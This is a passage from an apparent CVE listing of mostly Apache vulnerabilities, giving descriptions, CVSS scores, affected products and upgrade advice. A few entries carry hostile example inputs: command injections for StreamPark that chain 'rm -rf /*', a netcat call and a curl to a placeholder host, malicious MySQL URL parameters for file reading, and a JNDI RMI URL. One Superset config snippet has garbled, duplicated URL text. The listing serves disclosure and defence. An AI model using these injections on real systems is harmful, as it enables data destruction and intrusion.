LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

Products Affected

Vendor Product Version
libssh libssh *
matez jsch *
lancom-systems lanconfig -
redhat openshift_serverless -
thorntech sftp_gateway_firmware *
apache sshj *
russh_project russh *
openbsd openssh *
panic transmit_5 *
redhat openshift_container_platform 4.0
redhat openshift_gitops -
lancom-systems lcos_lx -
vandyke securecrt *
redhat openstack_platform 16.1
microsoft powershell *
filezilla-project filezilla_client *
lancom-systems lcos_sx 4.20
lancom-systems lcos_sx 5.20
redhat keycloak -
netsarang xshell_7 *
redhat enterprise_linux 8.0
redhat advanced_cluster_security 4.0
erlang erlang/otp *
lancom-systems lcos *
paramiko paramiko *
oryx-embedded cyclone_ssh *
bitvise ssh_client *
redhat discovery -
proftpd proftpd *
asyncssh_project asyncssh *
tinyssh tinyssh *
dropbear_ssh_project dropbear_ssh *
redhat jboss_enterprise_application_platform 7.0
apple macos *
lancom-systems lcos_fx -
golang crypto *
debian debian_linux 10.0
fedoraproject fedora 39
apache sshd *
gentoo security -
crates thrussh *
fedoraproject fedora 38
redhat advanced_cluster_security 3.0
jadaptive maverick_synergy_java_ssh_api *
net-ssh net-ssh 7.2.0
freebsd freebsd *
roumenpetrov pkixssh *
ssh2_project ssh2 *
redhat openstack_platform 17.1
netgate pfsense_ce *
kitty_project kitty *
trilead ssh2 6401
redhat storage 3.0
netgate pfsense_plus *
panic nova *
redhat cert-manager_operator_for_red_hat_openshift -
redhat openshift_dev_spaces -
putty putty *
redhat single_sign-on 7.0
redhat openshift_data_foundation 4.0
tera_term_project tera_term *
redhat openshift_developer_tools_and_services -
ssh ssh *
connectbot sshlib *
redhat enterprise_linux 9.0
redhat openstack_platform 16.2
redhat openshift_api_for_data_protection -
winscp winscp *
redhat openshift_pipelines -
redhat openshift_virtualization 4
redhat ceph_storage 6.0
crushftp crushftp *
bitvise ssh_server *
libssh2 libssh2 *
sftpgo_project sftpgo *
CVE-2023-48796

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler. The information exposed to unauthorized actors may include sensitive data such as database credentials. Users who can't upgrade to the fixed version can also set environment variable `MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=health,metrics,prometheus` to workaround this, or add the following section in the `application.yaml` file ``` management:   endpoints:     web:       exposure:         include: health,metrics,prometheus ``` This issue affects Apache DolphinScheduler: from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49068

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler.This issue affects Apache DolphinScheduler: before 3.2.1. Users are recommended to upgrade to version 3.2.1, which fixes the issue. At the time of disclosure of this advisory, this version has not yet been released. In the mean time, we recommend you make sure the logs are only available to trusted operators.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49070

Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.  Users are recommended to upgrade to version 18.12.10

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-49145

Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface that is vulnerable to DOM-based cross-site scripting. If an authenticated user, who is authorized to configure a JoltTransformJSON Processor, visits a crafted URL, then arbitrary JavaScript code can be executed within the session context of the authenticated user. Upgrading to Apache NiFi 1.24.0 or 2.0.0-M1 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 7.9 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L 1.3 6.0

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-49198

Mysql security vulnerability in Apache SeaTunnel. Attackers can read files on the MySQL server by modifying the information in the MySQL URL allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360 This issue affects Apache SeaTunnel: 1.0.0. Users are recommended to upgrade to version [1.0.1], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache seatunnel 1.0.0
CVE-2023-49299

Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server.This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49566

In Apache Linkis <=1.5.0, due to the lack of effective filtering of parameters, an attacker configuring malicious db2 parameters in the DataSource Manager Module will result in jndi injection. Therefore, the parameters in the DB2 URL should be blacklisted.  This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis <=1.5.0 will be affected. We recommend users upgrade the version of Linkis to version 1.6.0.

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-49582

Lax permissions set by the Apache Portable Runtime library on Unix platforms would allow local users read access to named shared memory segments, potentially revealing sensitive application data. This issue does not affect non-Unix platforms, or builds with APR_USE_SHMEM_SHMGET=1 (apr.h) Users are recommended to upgrade to APR version 1.7.5, which fixes this issue.

Products Affected

Vendor Product Version
apache portable_runtime *
CVE-2023-49619

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.0. Under normal circumstances, a user can only bookmark a question once, and will only increase the number of questions bookmarked once. However, repeat submissions through the script can increase the number of collection of the question many times. Users are recommended to upgrade to version [1.2.1], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N 1.6 1.4

Products Affected

Vendor Product Version
apache answer *
CVE-2023-49620

Before DolphinScheduler version 3.1.0, the login user could delete UDF function in the resource center unauthorized (which almost used in sql task), with unauthorized access vulnerability (IDOR), but after version 3.1.0 we fixed this issue. We mark this cve as moderate level because it still requires user login to operate, please upgrade to version 3.1.0 to avoid this vulnerability

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49657

A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS. For 2.X versions, users should change their config to include: TALISMAN_CONFIG = {     "content_security_policy": {         "base-uri": ["'self'"],         "default-src": ["'self'"],         "img-src": ["'self'", "blob:", "data:"],         "worker-src": ["'self'", "blob:"],         "connect-src": [             "'self'",             " https://api.mapbox.com" https://api.mapbox.com" ;,             " https://events.mapbox.com" https://events.mapbox.com" ;,         ],         "object-src": "'none'",         "style-src": [             "'self'",             "'unsafe-inline'",         ],         "script-src": ["'self'", "'strict-dynamic'"],     },     "content_security_policy_nonce_in": ["script-src"],     "force_https": False,     "session_cookie_secure": False, }

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N 3.1 5.8

Products Affected

Vendor Product Version
apache superset *
CVE-2023-49733

Improper Restriction of XML External Entity Reference vulnerability in Apache Cocoon.This issue affects Apache Cocoon: from 2.2.0 before 2.3.0. Users are recommended to upgrade to version 2.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cocoon *
CVE-2023-49734

An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6
security@apache.org 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N 3.1 4.0

Products Affected

Vendor Product Version
apache superset *
CVE-2023-49735

** UNSUPPORTED WHEN ASSIGNED ** The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled data to this key may be relatively common, as it was also used like that to set the language in the 'tiles-test' application shipped with Tiles. This issue affects Apache Tiles from version 2 onwards. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tiles *
CVE-2023-49736

A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-49898

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

Products Affected

Vendor Product Version
apache streampark *
CVE-2023-49920

Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser - by the user who also had Airflow UI opened - to trigger the execution of DAGs without the user's consent. Users are advised to upgrade to version 2.8.0 or later which is not affected

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50164

An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache struts *
CVE-2023-50290

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. The Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users are able to specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host, unlike Java system properties which are set per-Java-proccess. The Solr Metrics API is protected by the "metrics-read" permission. Therefore, Solr Clouds with Authorization setup will only be vulnerable via users with the "metrics-read" permission. This issue affects Apache Solr: from 9.0.0 before 9.3.0. Users are recommended to upgrade to version 9.3.0 or later, in which environment variables are not published via the Metrics API.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50291

Insufficiently Protected Credentials vulnerability in Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.3.0. One of the two endpoints that publishes the Solr process' Java system properties, /admin/info/properties, was only setup to hide system properties that had "password" contained in the name. There are a number of sensitive system properties, such as "basicauth" and "aws.secretKey" do not contain "password", thus their values were published via the "/admin/info/properties" endpoint. This endpoint populates the list of System Properties on the home screen of the Solr Admin page, making the exposed credentials visible in the UI. This /admin/info/properties endpoint is protected under the "config-read" permission. Therefore, Solr Clouds with Authorization enabled will only be vulnerable through logged-in users that have the "config-read" permission. Users are recommended to upgrade to version 9.3.0 or 8.11.3, which fixes the issue. A single option now controls hiding Java system property for all endpoints, "-Dsolr.hiddenSysProps". By default all known sensitive properties are hidden (including "-Dbasicauth"), as well as any property with a name containing "secret" or "password". Users who cannot upgrade can also use the following Java system property to fix the issue:   '-Dsolr.redaction.system.pattern=.*(password|secret|basicauth).*'

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50292

Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr. This issue affects Apache Solr: from 8.10.0 through 8.11.2, from 9.0.0 before 9.3.0. The Schema Designer was introduced to allow users to more easily configure and test new Schemas and configSets. However, when the feature was created, the "trust" (authentication) of these configSets was not considered. External library loading is only available to configSets that are "trusted" (created by authenticated users), thus non-authenticated users are unable to perform Remote Code Execution. Since the Schema Designer loaded configSets without taking their "trust" into account, configSets that were created by unauthenticated users were allowed to load external libraries when used in the Schema Designer. Users are recommended to upgrade to version 9.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50298

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter. When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides. An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, then send a streaming expression using the mock server's address in "zkHost". Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. From these versions on, only zkHost values that have the same server address (regardless of chroot), will use the given ZooKeeper credentials and ACLs when connecting.

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50378

Lack of proper input validation and constraint enforcement in Apache Ambari prior to 2.7.8    Impact : As it will be stored XSS, Could be exploited to perform unauthorized actions, varying from data access to session hijacking and delivering malicious payloads. Users are recommended to upgrade to version 2.7.8 which fixes this issue.

Products Affected

Vendor Product Version
apache ambari *
CVE-2023-50379

Malicious code injection in Apache Ambari in prior to 2.7.8. Users are recommended to upgrade to version 2.7.8, which fixes this issue. Impact: A Cluster Operator can manipulate the request by adding a malicious code injection and gain a root over the cluster main host.

Products Affected

Vendor Product Version
apache ambari *
CVE-2023-50380

XML External Entity injection in apache ambari versions <= 2.7.7, Users are recommended to upgrade to version 2.7.8, which fixes this issue. More Details: Oozie Workflow Scheduler had a vulnerability that allowed for root-level file reading and privilege escalation from low-privilege users. The vulnerability was caused through lack of proper user input validation. This vulnerability is known as an XML External Entity (XXE) injection attack. Attackers can exploit XXE vulnerabilities to read arbitrary files on the server, including sensitive system files. In theory, it might be possible to use this to escalate privileges.

Products Affected

Vendor Product Version
apache ambari *
CVE-2023-50386

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API. When backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups). If the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted. When Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. In these versions, the following protections have been added: * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader. * The Backup API restricts saving backups to directories that are used in the ClassLoader.

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50740

In Apache Linkis <=1.4.0, The password is printed to the log when using the Oracle data source of the Linkis data source module.  We recommend users upgrade the version of Linkis to version 1.5.0

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-50780

Apache ActiveMQ Artemis allows access to diagnostic information and controls through MBeans, which are also exposed through the authenticated Jolokia endpoint. Before version 2.29.0, this also included the Log4J2 MBean. This MBean is not meant for exposure to non-administrative users. This could eventually allow an authenticated attacker to write arbitrary files to the filesystem and indirectly achieve RCE. Users are recommended to upgrade to version 2.29.0 or later, which fixes the issue.

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2023-50783

Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50943

Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of "enable_xcom_pickling=False" configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50944

Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50968

Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-51388

Hertzbeat is a real-time monitoring system. In `CalculateAlarm.java`, `AviatorEvaluator` is used to directly execute the expression function, and no security policy is configured, resulting in AviatorScript (which can execute any static method by default) script injection. Version 1.4.1 fixes this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2023-51389

Hertzbeat is a real-time monitoring system. At the interface of `/define/yml`, SnakeYAML is used as a parser to parse yml content, but no security configuration is used, resulting in a YAML deserialization vulnerability. Version 1.4.1 fixes this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2023-51437

Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification. Users are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file. Any component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker. 2.11 Pulsar users should upgrade to at least 2.11.3. 3.0 Pulsar users should upgrade to at least 3.0.2. 3.1 Pulsar users should upgrade to at least 3.1.1. Any users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions. For additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.1.0
CVE-2023-51441

** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Axis allowed users with access to the admin service to perform possible SSRF This issue affects Apache Axis: through 1.3. As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. Alternatively you could use a build of Axis with the patch from https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 applied. The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

Products Affected

Vendor Product Version
apache axis *
CVE-2023-51467

The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-51518

Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data. Given a deserialisation gadjet, this could be leveraged as part of an exploit chain that could result in privilege escalation. Note that by default JMX endpoint is only bound locally. We recommend users to:  - Upgrade to a non-vulnerable Apache James version  - Run Apache James isolated from other processes (docker - dedicated virtual machine)  - If possible turn off JMX

Products Affected

Vendor Product Version
apache james 3.7.5
apache james 3.8.0
CVE-2023-51653

Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2023-51656

Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-51702

Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster. This behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
apache airflow_cncf_kubernetes *
CVE-2023-51747

Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling. A lenient behaviour in line delimiter handling might create a difference of interpretation between the sender and the receiver which can be exploited by an attacker to forge an SMTP envelop, allowing for instance to bypass SPF checks. The patch implies enforcement of CRLF as a line delimiter as part of the DATA transaction. We recommend James users to upgrade to non vulnerable versions.

Products Affected

Vendor Product Version
apache james 3.7.5
apache james 3.8.1
CVE-2023-51770

Arbitrary File Read Vulnerability in Apache Dolphinscheduler. This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-51784

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.5.0 through 1.9.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong's 1.10.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9329

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-51785

Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.7.0 through 1.9.0, the attackers can make a arbitrary file read attack using mysql driver. Users are advised to upgrade to Apache InLong's 1.10.0 or cherry-pick [1] to solve it. [1]  https://github.com/apache/inlong/pull/9331

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-52290

In streampark-console the list pages(e.g: application pages), users can sort page by field. This sort field is sent from the front-end to the back-end, and the SQL query is generated using this field. However, because this sort field isn't validated, there is a risk of SQL injection vulnerability. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, so this is a low-impact vulnerability. Mitigation: all users should upgrade to 2.1.4, Such parameters will be blocked.

Products Affected

Vendor Product Version
apache streampark *
CVE-2023-52291

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked。

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-21733

Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Other, EOL versions may also be affected. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
